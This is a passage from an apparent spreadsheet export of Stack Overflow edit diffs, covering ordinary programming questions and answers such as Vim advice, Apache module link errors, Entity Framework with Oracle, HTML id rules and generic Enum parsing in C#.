 &lt;p&gt;&lt;span class="diff-delete"&gt; A good place to start would be &lt;/span&gt;&lt;a href="http://dasunhegoda.com/tutorial-in-vim-editor-introduction-vim/510" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; First of all, you may want to pick up Vim; it has a vastly superior feature set along with everything vi has.&lt;/p&gt; _x000D_
 &lt;p&gt; That said, it takes discipline to learn. If you have a job and can't afford the productivity hit (without getting fired), I'd suggest taking on a weekend project for the sole purpose of learning the editor. Keep its documentation open as you work, and be disciplined enough not to chicken out. As you learn more, become efficient and start relying on muscle memory, it won't be as hard to stick with it.&lt;/p&gt; _x000D_
 &lt;p&gt; I've been using Vim for so long that I don't even think about what keys to press to search or navigate or save. And my hands never leave the keyboard. To use Vim is one of the best choices I've made in my programming career.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Edit:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I've tried compiling the file according to the readme on the site and I've tried to add extra libs to reduce the link errors. Ive got the following installed:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; Apache 2.2.9&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; Visual Studio 2008&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; ActivePerl&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; apxs-win32 from ApacheLounge&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; Subversion libs and headers&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I run the following command line:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-add"&gt;_x000D_
C:\Program Files\Apache Software Foundation\Apache2.2\bin&amp;gt;apxs -c -I ..\include\_x000D_
svn_config.h -L ..\lib -L C:\Progra~1\Micros~1.0\VC\lib -l apr-1.lib -l aprutil-_x000D_
1.lib -l svn_subr-1.lib -l libapr-1.lib -l libaprutil-1.lib -l libhttpd.lib -l l_x000D_
ibsvn_subr-1.lib -l mod_dav.lib mod_dontdothat.c_x000D_
&lt;/span&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Then I get the following errors:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-add"&gt;_x000D_
cl  /nologo /MD /W3 /O2 /D WIN32 /D _WINDOWS /D NDEBUG    -I"C:\PROGRA~1\APACHE~_x000D_
1\Apache2.2\include"  /I"..\include\svn_config.h"  /c /Fomod_dontdothat.lo mod_d_x000D_
ontdothat.c_x000D_
mod_dontdothat.c_x000D_
link kernel32.lib /nologo /subsystem:windows /dll /machine:I386 /libpath:"C:\PRO_x000D_
GRA~1\APACHE~1\Apache2.2\lib" /out:mod_dontdothat.so  /libpath:"..\lib"  /libpat_x000D_
h:"C:\Progra~1\Micros~1.0\VC\lib"  apr-1.lib aprutil-1.lib svn_subr-1.lib libapr_x000D_
-1.lib libaprutil-1.lib libhttpd.lib libsvn_subr-1.lib mod_dav.lib   mod_dontdot_x000D_
hat.lo_x000D_
   Creating library mod_dontdothat.lib and object mod_dontdothat.exp_x000D_
mod_dontdothat.lo : error LNK2019: unresolved external symbol _dav_svn_split_uri_x000D_
@32 referenced in function _is_this_legal_x000D_
svn_subr-1.lib(io.obj) : error LNK2001: unresolved external symbol __imp__libint_x000D_
l_dgettext_x000D_
svn_subr-1.lib(subst.obj) : error LNK2001: unresolved external symbol __imp__lib_x000D_
intl_dgettext_x000D_
svn_subr-1.lib(config_auth.obj) : error LNK2001: unresolved external symbol __im_x000D_
p__libintl_dgettext_x000D_
svn_subr-1.lib(time.obj) : error LNK2001: unresolved external symbol __imp__libi_x000D_
ntl_dgettext_x000D_
svn_subr-1.lib(nls.obj) : error LNK2001: unresolved external symbol __imp__libin_x000D_
tl_dgettext_x000D_
svn_subr-1.lib(dso.obj) : error LNK2001: unresolved external symbol __imp__libin_x000D_
tl_dgettext_x000D_
svn_subr-1.lib(path.obj) : error LNK2001: unresolved external symbol __imp__libi_x000D_
ntl_dgettext_x000D_
svn_subr-1.lib(prompt.obj) : error LNK2001: unresolved external symbol __imp__li_x000D_
bintl_dgettext_x000D_
svn_subr-1.lib(error.obj) : error LNK2019: unresolved external symbol __imp__lib_x000D_
intl_dgettext referenced in function _print_error_x000D_
svn_subr-1.lib(config.obj) : error LNK2001: unresolved external symbol __imp__li_x000D_
bintl_dgettext_x000D_
svn_subr-1.lib(utf.obj) : error LNK2001: unresolved external symbol __imp__libin_x000D_
tl_dgettext_x000D_
svn_subr-1.lib(cmdline.obj) : error LNK2001: unresolved external symbol __imp__l_x000D_
ibintl_dgettext_x000D_
svn_subr-1.lib(utf.obj) : error LNK2019: unresolved external symbol __imp__libin_x000D_
tl_sprintf referenced in function _fuzzy_escape_x000D_
svn_subr-1.lib(path.obj) : error LNK2001: unresolved external symbol __imp__libi_x000D_
ntl_sprintf_x000D_
svn_subr-1.lib(cmdline.obj) : error LNK2019: unresolved external symbol __imp__l_x000D_
ibintl_fprintf referenced in function _svn_cmdline_init_x000D_
svn_subr-1.lib(config_win.obj) : error LNK2019: unresolved external symbol __imp_x000D_
__SHGetFolderPathA@20 referenced in function _svn_config__win_config_path_x000D_
svn_subr-1.lib(config_win.obj) : error LNK2019: unresolved external symbol __imp_x000D_
__SHGetFolderPathW@20 referenced in function _svn_config__win_config_path_x000D_
svn_subr-1.lib(config_win.obj) : error LNK2019: unresolved external symbol __imp_x000D_
__RegCloseKey@4 referenced in function _svn_config__parse_registry_x000D_
svn_subr-1.lib(config_win.obj) : error LNK2019: unresolved external symbol __imp_x000D_
__RegEnumKeyExA@32 referenced in function _svn_config__parse_registry_x000D_
svn_subr-1.lib(config_win.obj) : error LNK2019: unresolved external symbol __imp_x000D_
__RegOpenKeyExA@20 referenced in function _svn_config__parse_registry_x000D_
svn_subr-1.lib(config_win.obj) : error LNK2019: unresolved external symbol __imp_x000D_
__RegQueryValueExA@24 referenced in function _parse_section_x000D_
svn_subr-1.lib(config_win.obj) : error LNK2019: unresolved external symbol __imp_x000D_
__RegEnumValueA@32 referenced in function _parse_section_x000D_
svn_subr-1.lib(win32_xlate.obj) : error LNK2019: unresolved external symbol __im_x000D_
p__CoUninitialize@0 referenced in function _svn_subr__win32_xlate_open_x000D_
svn_subr-1.lib(win32_xlate.obj) : error LNK2019: unresolved external symbol __im_x000D_
p__CoInitializeEx@8 referenced in function _svn_subr__win32_xlate_open_x000D_
svn_subr-1.lib(win32_xlate.obj) : error LNK2019: unresolved external symbol __im_x000D_
p__CoCreateInstance@20 referenced in function _get_page_id_from_name_x000D_
svn_subr-1.lib(nls.obj) : error LNK2019: unresolved external symbol __imp__libin_x000D_
tl_bindtextdomain referenced in function _svn_nls_init_x000D_
svn_subr-1.lib(stream.obj) : error LNK2019: unresolved external symbol _inflate_x000D_
referenced in function _read_handler_gz_x000D_
svn_subr-1.lib(stream.obj) : error LNK2019: unresolved external symbol _inflateI_x000D_
nit_ referenced in function _read_handler_gz_x000D_
svn_subr-1.lib(stream.obj) : error LNK2019: unresolved external symbol _deflate_x000D_
referenced in function _write_handler_gz_x000D_
svn_subr-1.lib(stream.obj) : error LNK2019: unresolved external symbol _deflateI_x000D_
nit_ referenced in function _write_handler_gz_x000D_
svn_subr-1.lib(stream.obj) : error LNK2019: unresolved external symbol _deflateE_x000D_
nd referenced in function _close_handler_gz_x000D_
svn_subr-1.lib(stream.obj) : error LNK2019: unresolved external symbol _inflateE_x000D_
nd referenced in function _close_handler_gz_x000D_
mod_dontdothat.so : fatal error LNK1120: 21 unresolved externals_x000D_
apxs:Error: Command failed with rc=6291456_x000D_
._x000D_
&lt;/span&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I'm not too much of a C guru, so any help in finding these unresolved external symbols will be much appreciated!&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Trumpi</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I understand that some countries have laws regarding website accessibility. In general, what &lt;span class="diff-delete"&gt;single most important requirement&lt;/span&gt; that a website must meet to be accessible, regardless of country?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I understand that some countries have laws regarding website accessibility. In general, what &lt;span class="diff-add"&gt;are the minimum requirements&lt;/span&gt; that a website must meet to be accessible, regardless of country?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>VirtuosiMedia</t>
  </si>
  <si>
    <t>Serhat Ozgel</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have used the Entity Framework to start a fairly simple sample project. &lt;span class="diff-delete"&gt; In&lt;/span&gt; the project, I have created a new Entity Data Model from a SQL Server 2000 database. &lt;span class="diff-delete"&gt; I&lt;/span&gt; am able to query the data using LINQ to Entities and display values on the screen.&lt;/p&gt; _x000D_
 &lt;p&gt; I have an Oracle database with an extremely similar schema (I am trying to be exact but I do not know all the details of Oracle). &lt;span class="diff-delete"&gt; I&lt;/span&gt; would like my project to be able to run on both the SQL Server and Oracle data stores with minimal effort. &lt;span class="diff-delete"&gt; I&lt;/span&gt; was hoping that I could simply change the configuration string of my Entity Data Model and the Entity Framework would take care of the rest. &lt;span class="diff-delete"&gt; However&lt;/span&gt;, it appears that will not work at seamlessly as I thought.&lt;/p&gt; _x000D_
 &lt;p&gt; Has anyone done what I am trying to do? &lt;span class="diff-delete"&gt; Again&lt;/span&gt;, I am trying to write an application that can query (and update) data from a SQL Server or Oracle database with minimal effort using the Entity Framework. &lt;span class="diff-delete"&gt; The&lt;/span&gt; secondary goal is to not have to re-compile the application when switching back and forth between data stores. &lt;span class="diff-delete"&gt; If&lt;/span&gt; I have to "Update Model from Database" that might be ok because I wouldn't have to recompile, but I'd prefer not to have to go this route. &lt;span class="diff-delete"&gt; Does&lt;/span&gt; anyone know of any steps that might be necessary?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have used the Entity Framework to start a fairly simple sample project. &lt;span class="diff-add"&gt;In&lt;/span&gt; the project, I have created a new Entity Data Model from a SQL Server 2000 database. &lt;span class="diff-add"&gt;I&lt;/span&gt; am able to query the data using LINQ to Entities and display values on the screen.&lt;/p&gt; _x000D_
 &lt;p&gt; I have an Oracle database with an extremely similar schema (I am trying to be exact but I do not know all the details of Oracle). &lt;span class="diff-add"&gt;I&lt;/span&gt; would like my project to be able to run on both the SQL Server and Oracle data stores with minimal effort. &lt;span class="diff-add"&gt;I&lt;/span&gt; was hoping that I could simply change the configuration string of my Entity Data Model and the Entity Framework would take care of the rest. &lt;span class="diff-add"&gt;However&lt;/span&gt;, it appears that will not work at seamlessly as I thought.&lt;/p&gt; _x000D_
 &lt;p&gt; Has anyone done what I am trying to do? &lt;span class="diff-add"&gt;Again&lt;/span&gt;, I am trying to write an application that can query (and update) data from a SQL Server or Oracle database with minimal effort using the Entity Framework. &lt;span class="diff-add"&gt;The&lt;/span&gt; secondary goal is to not have to re-compile the application when switching back and forth between data stores. &lt;span class="diff-add"&gt;If&lt;/span&gt; I have to "Update Model from Database" that might be ok because I wouldn't have to recompile, but I'd prefer not to have to go this route. &lt;span class="diff-add"&gt;Does&lt;/span&gt; anyone know of any steps that might be necessary?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>YeahStu</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; WPF UI's are easier to design&lt;span class="diff-delete"&gt;,&lt;/span&gt; implement and maintain than the current C# alternatives&lt;span class="diff-delete"&gt;. So&lt;/span&gt; if a lot of your codebase is responsible for handling UI, migrating may &lt;span class="diff-delete"&gt;be&lt;/span&gt; beneficial&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; As&lt;/span&gt; in, you'll find your team will save time in dealing with their UI layer. If most of your code is business logic, it won't help all that much.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; WPF UI's are easier to design implement and maintain than the current C# alternatives&lt;span class="diff-add"&gt;, so&lt;/span&gt; if a lot of your codebase is responsible for handling UI, migrating may &lt;span class="diff-add"&gt;serve&lt;/span&gt; beneficial&lt;span class="diff-add"&gt;-- as&lt;/span&gt; in, you'll find your team will save time in dealing with their UI layer. If most of your code is business logic, it won't help all that much.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Loren Segal</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Which is faster, &lt;em&gt;&lt;span class="diff-delete"&gt;python&lt;/span&gt;&lt;/em&gt; webpages or &lt;em&gt;&lt;span class="diff-delete"&gt;php&lt;/span&gt;&lt;/em&gt; webpages?&lt;/p&gt; _x000D_
 &lt;p&gt; Does anyone know how the speed of &lt;code&gt;&lt;span class="diff-delete"&gt;pylons&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;(or any of the other frameworks) compares to a similar website made with &lt;em&gt;&lt;span class="diff-delete"&gt;php&lt;/span&gt;&lt;/em&gt;?&lt;/p&gt; _x000D_
 &lt;p&gt; I know that serving a &lt;em&gt;&lt;span class="diff-delete"&gt;python&lt;/span&gt;&lt;/em&gt; base webpage via &lt;code&gt;&lt;span class="diff-delete"&gt;cgi&lt;/span&gt;&lt;/code&gt; is slower than &lt;em&gt;&lt;span class="diff-delete"&gt;php&lt;/span&gt;&lt;/em&gt; because of its long start up every time.&lt;/p&gt; _x000D_
 &lt;p&gt; I enjoy using &lt;code&gt;&lt;span class="diff-delete"&gt;pylons&lt;/span&gt;&lt;/code&gt; and I would still use it if it was slower than &lt;em&gt;&lt;span class="diff-delete"&gt;php&lt;/span&gt;&lt;/em&gt;. But if &lt;code&gt;&lt;span class="diff-delete"&gt;pylons&lt;/span&gt;&lt;/code&gt; was faster than &lt;em&gt;&lt;span class="diff-delete"&gt;php&lt;/span&gt;&lt;/em&gt;, I could maybe, hopefully, eventually convince my employer to allow me to convert the site over to &lt;code&gt;&lt;span class="diff-delete"&gt;pylons&lt;/span&gt;&lt;/code&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Which is faster, &lt;span class="diff-add"&gt;python&lt;/span&gt; webpages or &lt;span class="diff-add"&gt;php&lt;/span&gt; webpages?&lt;/p&gt; _x000D_
 &lt;p&gt; Does anyone know how the speed of &lt;span class="diff-add"&gt;pylons&lt;/span&gt;(or any of the other frameworks) compares to a similar website made with &lt;span class="diff-add"&gt;php&lt;/span&gt;?&lt;/p&gt; _x000D_
 &lt;p&gt; I know that serving a &lt;span class="diff-add"&gt;python&lt;/span&gt; base webpage via &lt;span class="diff-add"&gt;cgi&lt;/span&gt; is slower than &lt;span class="diff-add"&gt;php&lt;/span&gt; because of its long start up every time.&lt;/p&gt; _x000D_
 &lt;p&gt; I enjoy using &lt;span class="diff-add"&gt;pylons&lt;/span&gt; and I would still use it if it was slower than &lt;span class="diff-add"&gt;php&lt;/span&gt;. But if &lt;span class="diff-add"&gt;pylons&lt;/span&gt; was faster than &lt;span class="diff-add"&gt;php&lt;/span&gt;, I could maybe, hopefully, eventually convince my employer to allow me to convert the site over to &lt;span class="diff-add"&gt;pylons&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>user3942918</t>
  </si>
  <si>
    <t>Azat Ibrakov</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Timestamps in Javascript&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;//Usual Way_x000D_
var d=new Date();_x000D_
timestamp=d.getTime();_x000D_
_x000D_
//Shorter Way_x000D_
timestamp=(new Date()).getTime();_x000D_
_x000D_
//Shortest Way_x000D_
&lt;span class="diff-delete"&gt;timestamp+=new&lt;/span&gt; Date();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Timestamps in Javascript&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;//Usual Way_x000D_
var d=new Date();_x000D_
timestamp=d.getTime();_x000D_
_x000D_
//Shorter Way_x000D_
timestamp=(new Date()).getTime();_x000D_
_x000D_
//Shortest Way_x000D_
&lt;span class="diff-add"&gt;timestamp=+new&lt;/span&gt; Date();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Adriano Varoli Piazza</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; For &lt;a href="http://www.w3.org/TR/html4/types.html#type-id" rel="nofollow noreferrer"&gt;HTML 4&lt;/a&gt;, the answer is technically:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; ID and NAME tokens must begin with a letter ([A-Za-z]) and may be followed by any number of letters, digits ([0-9]), hyphens ("-"), underscores ("_"), colons (":"), and periods (".").&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt;&lt;a href="https://www.w3.org/TR/html5/dom.html#element-attrdef-global-id" rel="nofollow noreferrer"&gt;HTML 5&lt;/a&gt; is even more permissive, saying only that id must contain at least one character and may not contain any space characters.&lt;/p&gt; _x000D_
 &lt;p&gt; The id attribute is case sensitive in &lt;a href="https://www.w3.org/TR/xhtml1/diffs.html#h-4.2" rel="nofollow noreferrer"&gt;XHTML&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; As a purely practical matter, you may want to avoid certain characters. Periods, colons and '#' have special meaning in CSS selectors, so you will have to escape those characters using a &lt;a href="http://www.w3.org/TR/CSS2/syndata.html#value-def-identifier" rel="nofollow noreferrer"&gt;backslash in CSS&lt;/a&gt; or a double backslash in a &lt;a href="http://learn.jquery.com/using-jquery-core/faq/how-do-i-select-an-element-by-an-id-that-has-characters-used-in-css-notation/" rel="nofollow noreferrer"&gt;selector string passed to jQuery&lt;/a&gt;. Think about how often you will have to escape a character in your stylesheets or code before you go crazy with periods and colons in ids.&lt;/p&gt; _x000D_
 &lt;p&gt; For example, the HTML declaration &lt;code&gt;&amp;lt;div id="first.name"&amp;gt;&amp;lt;/div&amp;gt;&lt;/code&gt; is valid. You can select that element in CSS as &lt;code&gt;#first\.name&lt;/code&gt; and in jQuery like so: &lt;code&gt;$('#first\\.name').&lt;/code&gt; But if you forget the backslash, &lt;code&gt;$('#first.name')&lt;/code&gt;, you will have a perfectly valid selector looking for an element with id &lt;code&gt;first&lt;/code&gt; and also having class &lt;code&gt;name&lt;/code&gt;. This is a bug that is easy to overlook. You might be happier&lt;span class="diff-delete"&gt;,&lt;/span&gt; in the long run&lt;span class="diff-delete"&gt;,&lt;/span&gt; choosing the id &lt;code&gt;first-name&lt;/code&gt; (a hyphen rather than a period), instead.&lt;/p&gt; _x000D_
 &lt;p&gt; You can simplify your development tasks by strictly sticking to a naming convention. For example, if you limit yourself entirely to lower-case characters and always separate words with either hyphens or underscores (but not both, pick one and never use the other), then you have an easy-to-remember pattern. You will never wonder "was it &lt;code&gt;firstName&lt;/code&gt; or &lt;code&gt;FirstName&lt;/code&gt;?" because you will always know that you should type &lt;code&gt;first_name&lt;/code&gt;. Prefer camel case? Then limit yourself to that, no hyphens or underscores, and always, consistently use either upper-case or lower-case for the first character, don't mix them.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; A now very obscure problem was that at least one browser, Netscape 6, &lt;a href="https://developer.mozilla.org/en-US/docs/Case_Sensitivity_in_class_and_id_Names" rel="nofollow noreferrer"&gt;incorrectly treated id attribute values as case-sensitive&lt;/a&gt;. That meant that if you had typed &lt;code&gt;id="firstName"&lt;/code&gt; in your HTML (lower-case 'f') and &lt;code&gt;#FirstName { color: red }&lt;/code&gt; in your CSS (upper-case 'F'), that buggy browser would have failed to set the element's color to red. At the time of this edit, April 2015, I hope you aren't being asked to support Netscape 6. Consider this historical footnote.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; For &lt;a href="http://www.w3.org/TR/html4/types.html#type-id" rel="nofollow noreferrer"&gt;HTML 4&lt;/a&gt;, the answer is technically:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; ID and NAME tokens must begin with a letter ([A-Za-z]) and may be followed by any number of letters, digits ([0-9]), hyphens ("-"), underscores ("_"), colons (":"), and periods (".").&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt;&lt;a href="https://www.w3.org/TR/html5/dom.html#element-attrdef-global-id" rel="nofollow noreferrer"&gt;HTML 5&lt;/a&gt; is even more permissive, saying only that&lt;span class="diff-add"&gt; an&lt;/span&gt; id must contain at least one character and may not contain any space characters.&lt;/p&gt; _x000D_
 &lt;p&gt; The id attribute is case sensitive in &lt;a href="https://www.w3.org/TR/xhtml1/diffs.html#h-4.2" rel="nofollow noreferrer"&gt;XHTML&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; As a purely practical matter, you may want to avoid certain characters. Periods, colons and '#' have special meaning in CSS selectors, so you will have to escape those characters using a &lt;a href="http://www.w3.org/TR/CSS2/syndata.html#value-def-identifier" rel="nofollow noreferrer"&gt;backslash in CSS&lt;/a&gt; or a double backslash in a &lt;a href="http://learn.jquery.com/using-jquery-core/faq/how-do-i-select-an-element-by-an-id-that-has-characters-used-in-css-notation/" rel="nofollow noreferrer"&gt;selector string passed to jQuery&lt;/a&gt;. Think about how often you will have to escape a character in your stylesheets or code before you go crazy with periods and colons in ids.&lt;/p&gt; _x000D_
 &lt;p&gt; For example, the HTML declaration &lt;code&gt;&amp;lt;div id="first.name"&amp;gt;&amp;lt;/div&amp;gt;&lt;/code&gt; is valid. You can select that element in CSS as &lt;code&gt;#first\.name&lt;/code&gt; and in jQuery like so: &lt;code&gt;$('#first\\.name').&lt;/code&gt; But if you forget the backslash, &lt;code&gt;$('#first.name')&lt;/code&gt;, you will have a perfectly valid selector looking for an element with id &lt;code&gt;first&lt;/code&gt; and also having class &lt;code&gt;name&lt;/code&gt;. This is a bug that is easy to overlook. You might be happier in the long run choosing the id &lt;code&gt;first-name&lt;/code&gt; (a hyphen rather than a period), instead.&lt;/p&gt; _x000D_
 &lt;p&gt; You can simplify your development tasks by strictly sticking to a naming convention. For example, if you limit yourself entirely to lower-case characters and always separate words with either hyphens or underscores (but not both, pick one and never use the other), then you have an easy-to-remember pattern. You will never wonder "was it &lt;code&gt;firstName&lt;/code&gt; or &lt;code&gt;FirstName&lt;/code&gt;?" because you will always know that you should type &lt;code&gt;first_name&lt;/code&gt;. Prefer camel case? Then limit yourself to that, no hyphens or underscores, and always, consistently use either upper-case or lower-case for the first character, don't mix them.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt; A now very obscure problem was that at least one browser, Netscape 6, &lt;a href="https://developer.mozilla.org/en-US/docs/Case_Sensitivity_in_class_and_id_Names" rel="nofollow noreferrer"&gt;incorrectly treated id attribute values as case-sensitive&lt;/a&gt;. That meant that if you had typed &lt;code&gt;id="firstName"&lt;/code&gt; in your HTML (lower-case 'f') and &lt;code&gt;#FirstName { color: red }&lt;/code&gt; in your CSS (upper-case 'F'), that buggy browser would have failed to set the element's color to red. At the time of this edit, April 2015, I hope you aren't being asked to support Netscape 6. Consider this&lt;span class="diff-add"&gt; a&lt;/span&gt; historical footnote.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>dgvid</t>
  </si>
  <si>
    <t>Amin.MasterkinG</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm building a function to extend the Enum.Parse concept that&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; allows a default value to be parsed in case that an Enum value is not found&lt;/li&gt; _x000D_
  &lt;li&gt; Is case insensitive&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; So I wrote the following&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;        &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; T &lt;span class="hljs-title"&gt;GetEnumFromString&lt;/span&gt;&amp;lt;&lt;span class="hljs-title"&gt;T&lt;/span&gt;&amp;gt;(&lt;span class="hljs-params"&gt;&lt;span class="hljs-built_in"&gt;string&lt;/span&gt; &lt;span class="hljs-keyword"&gt;value&lt;/span&gt;, T defaultValue&lt;/span&gt;) &lt;span class="hljs-keyword"&gt;where&lt;/span&gt; T : Enum&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-function"&gt;, IConvertible&lt;/span&gt;&lt;/span&gt;_x000D_
        {_x000D_
            &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (&lt;span class="hljs-built_in"&gt;string&lt;/span&gt;.IsNullOrEmpty(&lt;span class="hljs-keyword"&gt;value&lt;/span&gt;)) &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; defaultValue;_x000D_
            &lt;span class="hljs-keyword"&gt;foreach&lt;/span&gt; (T item &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; Enum.GetValues(&lt;span class="hljs-keyword"&gt;typeof&lt;/span&gt;(T)))_x000D_
            {_x000D_
                &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (item.ToString().ToLower().Equals(&lt;span class="hljs-keyword"&gt;value&lt;/span&gt;.Trim().ToLower())) &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; item;_x000D_
            }_x000D_
            &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; defaultValue;_x000D_
        }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I am getting a Error Constraint cannot be special class 'System.Enum'&lt;/p&gt; _x000D_
 &lt;p&gt; Fair enough, but is there a workaround to allow a Generic Enum, or am I going to have to mimic the Parse function and pass a type as an attribute, which forces the ugly boxing requirement to your code.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt; All suggestions below have been greatly appreciated, thanks&lt;/p&gt; _x000D_
 &lt;p&gt; Have settled on (I've left the loop to maintain case insensitivity - I am usng this when parsing XML)&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; &lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;EnumUtils&lt;/span&gt;_x000D_
{_x000D_
    &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;static&lt;/span&gt; T &lt;span class="hljs-title"&gt;ParseEnum&lt;/span&gt;&amp;lt;&lt;span class="hljs-title"&gt;T&lt;/span&gt;&amp;gt;(&lt;span class="hljs-params"&gt;&lt;span class="hljs-built_in"&gt;string&lt;/span&gt; &lt;span class="hljs-keyword"&gt;value&lt;/span&gt;, T defaultValue&lt;/span&gt;) &lt;span class="hljs-keyword"&gt;where&lt;/span&gt; T : &lt;span class="hljs-keyword"&gt;struct&lt;/span&gt;&lt;/span&gt;_x000D_
    {_x000D_
